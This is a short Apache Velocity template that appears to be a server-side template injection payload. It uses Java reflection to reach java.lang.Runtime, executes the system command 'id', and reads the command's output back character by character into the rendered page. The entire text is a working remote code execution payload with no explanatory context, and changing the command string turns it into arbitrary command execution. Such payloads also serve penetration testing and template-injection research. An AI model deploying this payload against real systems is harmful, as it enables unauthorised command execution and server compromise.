#set ($exp="exp")
#set ($str=$exp.getClass().forName("java.lang.String"))
#set ($chr=$exp.getClass().forName("java.lang.Character"))
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("id"))
#set ($out=$a.getInputStream())

#set ($result="")
#foreach($i in [2..$out.available()])
    #set($tmp=$str.valueOf($chr.toChars($out.read())))
    #set($result="$result$tmp")
#end

$result
